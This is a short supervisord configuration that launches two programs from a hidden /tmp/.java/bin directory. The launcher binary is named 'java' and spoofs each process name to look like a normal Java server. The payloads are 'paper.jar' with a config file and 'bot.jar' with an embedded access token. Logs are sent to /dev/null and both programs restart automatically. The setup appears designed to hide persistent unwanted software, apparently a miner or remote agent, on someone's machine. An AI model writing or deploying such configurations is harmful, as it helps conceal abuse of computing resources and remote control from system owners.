[supervisord]
logfile=/dev/null

[program:app]
directory=/tmp/.java/bin
command=./java -a 'java -Dterminal.jline=false -Dterminal.ansi=true -jar server.jar' ./paper.jar -c ./conf.json
stdout_logfile=/dev/null
autorestart = true

[program:gnet]
directory=/tmp/.java/bin
command=./java -a 'java -Dterminal.jline=false -Dterminal.ansi=true -jar server.jar' ./bot.jar -s "i0A1E6x1-h9g2H3k-5j7K7o1X1C-y7F9g8i0-J6d6A2c5J1g6" -liq
stdout_logfile=/dev/null
autorestart = true